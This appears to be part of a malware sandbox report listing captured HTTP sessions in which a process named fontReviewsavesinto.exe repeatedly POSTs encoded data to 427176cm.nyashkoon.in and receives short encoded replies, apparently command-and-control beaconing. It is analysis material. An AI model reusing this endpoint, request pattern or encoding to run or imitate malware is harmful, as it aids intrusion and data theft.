                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        98192.168.2.75006837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:41.761965990 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:42.114909887 CET1300OUTData Raw: 5b 55 46 5f 59 55 5f 52 5e 5e 54 55 56 5b 5a 50 5f 5b 59 51 52 5b 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UF_YU_R^^TUV[ZP_[YQR[R_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C%";0==Y'83=%00<'_=="3?53.#Y$('X=&G!']*#
                                        Nov 5, 2024 08:13:42.565625906 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:42.637969971 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5f 27 28 30 57 23 14 00 54 2b 58 3f 03 23 34 2c 02 38 3e 38 11 30 33 05 0c 3d 59 3e 16 20 3a 29 00 22 13 30 58 37 2d 2c 0d 29 31 2f 5a 07 10 25 58 25 22 3c 0c 31 58 27 01 27 0a 38 05 29 2c 34 10 21 05 3c 03 27 2b 31 1c 26 5c 37 50 2f 29 0c 0f 2d 28 37 5f 2d 31 0d 01 25 24 2c 54 0d 10 3a 0f 2a 1f 0e 53 28 2f 25 5f 32 37 34 1e 23 2d 23 5b 3d 3a 20 57 28 3d 39 04 24 33 20 52 35 0b 26 0f 32 05 2c 5c 25 31 3f 08 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9_'(0W#T+X?#4,8>803=Y> :)"0X7-,)1/Z%X%"<1X''8),4!<'+1&\7P/)-(7_-1%$,T:*S(/%_274#-#[=: W(=9$3 R5&2,\%1?%"%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        99192.168.2.75006937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:41.883176088 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:42.239726067 CET1032OUTData Raw: 5b 5c 43 52 5c 58 5f 50 5e 5e 54 55 56 52 5a 5f 5f 54 59 5f 52 51 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\CR\X_P^^TUVRZ__TY_RQR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$?0_3 ,/*&<[$Z<)='-3. 38 =&G!']*
                                        Nov 5, 2024 08:13:42.695233107 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:42.769951105 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        100192.168.2.75007037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:42.899291039 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:43.255466938 CET1032OUTData Raw: 5b 5e 46 5d 5c 5f 5f 52 5e 5e 54 55 56 5e 5a 5d 5f 53 59 5c 52 5f 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^F]\__R^^TUV^Z]_SY\R_R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$0=_$#,] >;$$(-=3?&]'-#^'+Z=:&G!']*7
                                        Nov 5, 2024 08:13:43.718949080 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:43.798033953 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        101192.168.2.75007137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:43.928463936 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:44.286647081 CET1028OUTData Raw: 5b 5b 43 52 59 5d 5a 52 5e 5e 54 55 56 5a 5a 5e 5f 52 59 5e 52 5e 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[CRY]ZR^^TUVZZ^_RY^R^RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'2;3>:%"+8(;=X0<?=U09&=3#\*&G!']*
                                        Nov 5, 2024 08:13:44.749017000 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:44.831003904 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        102192.168.2.75007237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:44.963987112 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:45.317866087 CET1032OUTData Raw: 5b 59 43 5b 5c 59 5a 52 5e 5e 54 55 56 5d 5a 5b 5f 54 59 5b 52 58 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YC[\YZR^^TUV]Z[_TY[RXR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-02$1^32Z888^>5(X0'>[2P0%0=0$+;+:&G!']*
                                        Nov 5, 2024 08:13:45.806966066 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:45.885006905 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        103192.168.2.75007337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:46.008929968 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:46.366379976 CET1032OUTData Raw: 5e 5a 46 5e 59 5b 5f 56 5e 5e 54 55 56 5f 5a 5f 5f 52 59 5b 52 5e 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZF^Y[_V^^TUV_Z__RY[R^RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C$",0=1Y$$,;*%Y'/#Y).*T%<'\38)&G!']*3
                                        Nov 5, 2024 08:13:46.818273067 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:46.892985106 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        104192.168.2.75007437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:47.026544094 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:47.380453110 CET1032OUTData Raw: 5b 54 43 52 59 54 5a 5d 5e 5e 54 55 56 5e 5a 5b 5f 56 59 5b 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [TCRYTZ]^^TUV^Z[_VY[R_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-31 '-_3 ]8;=6<%,'[*>*U06Y'.80 +*&G!']*7


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        105192.168.2.75007537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:47.660259008 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:48.005398035 CET1300OUTData Raw: 5b 58 43 5a 59 5c 5a 5d 5e 5e 54 55 56 5d 5a 5c 5f 53 59 51 52 5d 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCZY\Z]^^TUV]Z\_SYQR]R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$$3>-^3(^;]3*%?#)>U%/6$-('8?]*:&G!']*
                                        Nov 5, 2024 08:13:49.323996067 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:49.325057983 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5f 30 28 0d 0c 20 3a 0b 08 3c 58 23 03 21 09 0d 5d 2c 04 33 00 27 33 3c 55 29 3f 39 0b 23 39 36 11 21 2d 28 5d 34 58 2f 53 3e 21 2f 5a 07 10 25 5a 24 22 33 54 25 07 37 03 30 30 24 07 29 2f 24 5c 35 05 28 03 25 3b 17 58 25 04 06 0a 38 5f 31 1f 2e 38 01 5b 2e 31 30 1c 26 1e 2c 54 0d 10 39 50 3e 32 28 57 28 2f 39 17 25 24 24 52 23 3e 3f 58 29 5c 24 53 2a 2d 26 1a 30 23 3f 0f 20 32 29 54 31 02 34 11 27 21 34 18 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9_0( :<X#!],3'3<U)?9#96!-(]4X/S>!/Z%Z$"3T%700$)/$\5(%;X%8_1.8[.10&,T9P>2(W(/9%$$R#>?X)\$S*-&0#? 2)T14'!4%"%U,.V0WQ
                                        Nov 5, 2024 08:13:49.325149059 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5f 30 28 0d 0c 20 3a 0b 08 3c 58 23 03 21 09 0d 5d 2c 04 33 00 27 33 3c 55 29 3f 39 0b 23 39 36 11 21 2d 28 5d 34 58 2f 53 3e 21 2f 5a 07 10 25 5a 24 22 33 54 25 07 37 03 30 30 24 07 29 2f 24 5c 35 05 28 03 25 3b 17 58 25 04 06 0a 38 5f 31 1f 2e 38 01 5b 2e 31 30 1c 26 1e 2c 54 0d 10 39 50 3e 32 28 57 28 2f 39 17 25 24 24 52 23 3e 3f 58 29 5c 24 53 2a 2d 26 1a 30 23 3f 0f 20 32 29 54 31 02 34 11 27 21 34 18 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9_0( :<X#!],3'3<U)?9#96!-(]4X/S>!/Z%Z$"3T%700$)/$\5(%;X%8_1.8[.10&,T9P>2(W(/9%$$R#>?X)\$S*-&0#? 2)T14'!4%"%U,.V0WQ
                                        Nov 5, 2024 08:13:49.325659990 CET333INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 30 37 3a 31 33 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 0d 15 39 5f 30 28 0d 0c 20 3a 0b 08 3c 58 23 03 21 09 0d 5d 2c 04 33 00 27 33 3c 55 29 3f 39 0b 23 39 36 11 21 2d 28 5d 34 58 2f 53 3e 21 2f 5a 07 10 25 5a 24 22 33 54 25 07 37 03 30 30 24 07 29 2f 24 5c 35 05 28 03 25 3b 17 58 25 04 06 0a 38 5f 31 1f 2e 38 01 5b 2e 31 30 1c 26 1e 2c 54 0d 10 39 50 3e 32 28 57 28 2f 39 17 25 24 24 52 23 3e 3f 58 29 5c 24 53 2a 2d 26 1a 30 23 3f 0f 20 32 29 54 31 02 34 11 27 21 34 18 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 07:13:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 152Connection: keep-alive9_0( :<X#!],3'3<U)?9#96!-(]4X/S>!/Z%Z$"3T%700$)/$\5(%;X%8_1.8[.10&,T9P>2(W(/9%$$R#>?X)\$S*-&0#? 2)T14'!4%"%U,.V0WQ
                                        Nov 5, 2024 08:13:49.326236010 CET333INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 30 37 3a 31 33 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 0d 15 39 5f 30 28 0d 0c 20 3a 0b 08 3c 58 23 03 21 09 0d 5d 2c 04 33 00 27 33 3c 55 29 3f 39 0b 23 39 36 11 21 2d 28 5d 34 58 2f 53 3e 21 2f 5a 07 10 25 5a 24 22 33 54 25 07 37 03 30 30 24 07 29 2f 24 5c 35 05 28 03 25 3b 17 58 25 04 06 0a 38 5f 31 1f 2e 38 01 5b 2e 31 30 1c 26 1e 2c 54 0d 10 39 50 3e 32 28 57 28 2f 39 17 25 24 24 52 23 3e 3f 58 29 5c 24 53 2a 2d 26 1a 30 23 3f 0f 20 32 29 54 31 02 34 11 27 21 34 18 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 07:13:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 152Connection: keep-alive9_0( :<X#!],3'3<U)?9#96!-(]4X/S>!/Z%Z$"3T%700$)/$\5(%;X%8_1.8[.10&,T9P>2(W(/9%$$R#>?X)\$S*-&0#? 2)T14'!4%"%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        106192.168.2.75007637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:47.776051998 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:48.130321026 CET1032OUTData Raw: 5b 58 46 58 59 58 5a 52 5e 5e 54 55 56 58 5a 58 5f 52 59 5c 52 58 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XFXYXZR^^TUVXZX_RY\RXR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$",^$=!'<8$>&''?+Z(=.36\&.$$(>:&G!']*/
                                        Nov 5, 2024 08:13:49.325160027 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:49.325248957 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:49.325334072 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:49.326008081 CET183INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 30 37 3a 31 33 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3f 5d 40 56
                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 07:13:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        107192.168.2.75007737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:49.447833061 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:49.802268982 CET1032OUTData Raw: 5b 5d 43 52 59 55 5a 57 5e 5e 54 55 56 5e 5a 5b 5f 51 59 5a 52 5c 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CRYUZW^^TUV^Z[_QYZR\R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C%!,39X%2(\,,=6?'+Z*$,_'>4$;7*&G!']*7
                                        Nov 5, 2024 08:13:50.272866011 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:50.358350039 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        108192.168.2.75007837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:50.493639946 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:50.850342989 CET1032OUTData Raw: 5b 55 43 5a 5c 5a 5f 52 5e 5e 54 55 56 5c 5a 58 5f 57 59 5a 52 5f 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UCZ\Z_R^^TUV\ZX_WYZR_R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$!$3:3T+88,*%0Y0?8)>-3?6X$ 0(0):&G!']*?
                                        Nov 5, 2024 08:13:51.316674948 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:51.392174006 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
